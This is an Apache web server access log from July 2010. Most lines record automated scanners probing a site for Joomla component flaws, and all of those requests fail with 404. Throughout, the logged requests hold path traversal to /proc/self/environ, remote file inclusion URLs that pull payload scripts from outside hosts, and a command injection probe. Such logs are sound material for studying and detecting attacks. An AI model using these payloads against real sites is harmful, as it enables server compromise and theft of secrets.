83.149.110.213 - - [26/Jul/2010:14:50:21 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:50:21 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:50:25 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:50:25 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
64.34.172.171 - - [26/Jul/2010:14:50:29 +0200] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
83.149.110.213 - - [26/Jul/2010:14:50:42 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:50:42 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:50:51 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:50:51 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
76.242.100.234 - - [26/Jul/2010:14:52:19 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:14:52:19 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:14:52:54 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:14:52:54 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
207.46.204.192 - - [26/Jul/2010:14:53:57 +0200] "GET /logs/error_log HTTP/1.1" 200 92387 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.149.110.213 - - [26/Jul/2010:15:00:14 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:14 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:15 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:15 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:15 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:16 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:15:00:17 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:00:17 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
83.149.110.213 - - [26/Jul/2010:15:00:29 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:29 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:15:01:10 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:01:11 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
83.149.110.213 - - [26/Jul/2010:15:01:16 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:01:16 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:01:17 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:01:17 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:01:18 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:01:18 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:01:36 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:01:36 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:15:01:40 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:01:40 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
76.242.100.234 - - [26/Jul/2010:15:02:16 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:05:15 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:05:15 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:05:38 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:05:38 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
119.63.198.56 - - [26/Jul/2010:15:07:02 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.149.110.213 - - [26/Jul/2010:15:07:20 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:07:20 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:07:21 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:07:21 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:07:25 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:07:25 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:07:32 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:07:32 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:15:08:14 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:08:14 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
80.89.233.48 - - [26/Jul/2010:15:08:20 +0200] "GET /logs/error_log/http://www.ncfphilippines.org/Vid.txt?? HTTP/1.1" 404 338 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:15:08:21 +0200] "GET /http://www.ncfphilippines.org/Vid.txt?? HTTP/1.1" 404 323 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:15:08:21 +0200] "GET /logs/http://www.ncfphilippines.org/Vid.txt?? HTTP/1.1" 404 328 "-" "libwww-perl/5.79"
188.127.248.175 - - [26/Jul/2010:15:14:19 +0200] "GET /logs/error_log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:14:20 +0200] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:14:20 +0200] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
76.242.100.234 - - [26/Jul/2010:15:15:32 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:15:32 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
83.149.110.213 - - [26/Jul/2010:15:23:18 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:23:18 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
64.34.172.171 - - [26/Jul/2010:15:26:20 +0200] "GET /logs/error_log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:15:26:20 +0200] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:15:26:20 +0200] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
76.242.100.234 - - [26/Jul/2010:15:26:52 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:28:47 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:28:52 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:29:37 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:29:37 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
86.109.96.188 - - [26/Jul/2010:15:38:36 +0200] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
86.109.96.188 - - [26/Jul/2010:15:38:36 +0200] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
86.109.96.188 - - [26/Jul/2010:15:38:36 +0200] "GET /logs/access_log/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
86.109.96.188 - - [26/Jul/2010:15:39:44 +0200] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
86.109.96.188 - - [26/Jul/2010:15:39:44 +0200] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
86.109.96.188 - - [26/Jul/2010:15:39:45 +0200] "GET /logs/access_log/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:51:17 +0200] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:51:17 +0200] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:51:17 +0200] "GET /logs/access_log/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
207.46.13.99 - - [26/Jul/2010:15:51:23 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.202.2.34 - - [26/Jul/2010:15:52:54 +0200] "GET /logs//index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:52:54 +0200] "GET //index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:52:54 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:52:55 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:52:55 +0200] "GET //index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:52:55 +0200] "GET /logs//index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
207.46.13.99 - - [26/Jul/2010:15:57:29 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.247.204.39 - - [26/Jul/2010:15:58:18 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
61.247.204.39 - - [26/Jul/2010:15:58:19 +0200] "GET / HTTP/1.1" 200 559 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
77.222.34.35 - - [26/Jul/2010:16:03:45 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:03:45 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:03:45 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:03:47 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:03:47 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:03:47 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
114.108.151.149 - - [26/Jul/2010:16:22:04 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
207.46.199.198 - - [26/Jul/2010:16:35:34 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.222.34.35 - - [26/Jul/2010:16:35:39 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:35:39 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:35:39 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:35:48 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:35:48 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:35:48 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
114.108.151.149 - - [26/Jul/2010:16:42:28 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:55:12 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:55:13 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:55:14 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.14.78.194 - - [26/Jul/2010:17:00:36 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
83.14.78.194 - - [26/Jul/2010:17:00:37 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.14.78.194 - - [26/Jul/2010:17:00:37 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.220.97.153 - - [26/Jul/2010:17:10:46 +0200] "GET /logs/error_log/ HTTP/1.0" 404 301 "http://newark.comites-it.org/logs/error_log/" "Opera/9.00 (Windows NT 5.1; U; ru)"
95.220.97.153 - - [26/Jul/2010:17:10:47 +0200] "GET / HTTP/1.0" 200 559 "http://newark.comites-it.org/" "Opera/9.00 (Windows NT 5.1; U; ru)"
114.108.151.149 - - [26/Jul/2010:17:18:54 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:18:54 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:18:55 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
77.222.34.35 - - [26/Jul/2010:17:29:55 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 342 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:29:55 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:29:55 +0200] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 355 "-" "Mozilla/5.0"
217.16.18.219 - - [26/Jul/2010:17:58:45 +0200] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:17:59:25 +0200] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
95.158.16.135 - - [26/Jul/2010:18:13:41 +0200] "GET /logs/error_log/ HTTP/1.0" 404 301 "http://newark.comites-it.org/logs/error_log/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
95.158.16.135 - - [26/Jul/2010:18:13:41 +0200] "GET / HTTP/1.0" 200 559 "http://newark.comites-it.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
217.16.18.219 - - [26/Jul/2010:18:14:38 +0200] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:17:23 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:23:19 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:23:20 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:24:13 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:24:13 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:24:31 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:24:32 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.127.248.175 - - [26/Jul/2010:18:33:16 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:33:17 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:33:55 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:33:55 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
